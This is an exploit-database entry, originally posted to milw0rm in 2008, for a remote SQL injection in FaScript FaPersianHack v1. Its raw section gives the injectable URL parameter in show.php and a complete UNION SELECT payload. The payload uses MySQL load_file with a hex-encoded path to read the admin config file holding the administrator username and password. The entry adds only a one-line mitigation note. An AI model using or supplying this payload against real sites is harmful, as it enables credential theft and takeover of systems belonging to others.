FaScript FaPersianHack v1 Remote Sql Injection

vendor:

FaPersianHack

by:

IRCRASH (Dr.Crash)

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: FaPersianHack

Affected Version From: FaScript FaPersianHack v1

Affected Version To: FaScript FaPersianHack v1

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

FaScript FaPersianHack v1 Remote Sql Injection

A vulnerability exists in FaScript FaPersianHack v1 which allows an attacker to inject arbitrary SQL commands via the 'id' parameter in 'show.php'. This can be exploited to gain access to the admin username and password stored in './admin/pconfig.php' by using the 'load_file' function in MySQL.

Mitigation:

Input validation should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

#####################################################################################
####           FaScript FaPersianHack v1 Remote Sql Injection                    ####
####                              BY IRCRASH                                     ####
#####################################################################################
#                                                                                   #
#AUTHOR : IRCRASH (Dr.Crash)                                                        #
#                                                                                   #
#Script Download : http://fascript.com/fapersianhack.zip                            #
#                                                                                   #
#Injection Adress :  http://Sitename/ph/show.php?id=<SqL Code>                      #
#                                                                                   #
#Help : In This Script Admin Username and Password Save in ./admin/pconfig.php      #
#       You can open this file with load_file Function in mysql and see admin       #
#       Username and password in Page Source                                        #
#                                                                                   #
# ./admin/pconfig.php Str2Hex : 0x2e2f61646d696e2f70636f6e6669672e706870            #
#                                                                                   #
#SQL Code for pconfig.php : 999999'%20union/**/select/**/0,load_file(0x2e2f61646d696e2f70636f6e6669672e706870),3,4,5,6/**/from/**/mysql.user/*
#                                                                                   #
#                        Our site : HTTP://IRCRASH.COM                              #
#                                                                                   #
#####################################################################################

# milw0rm.com [2008-01-15]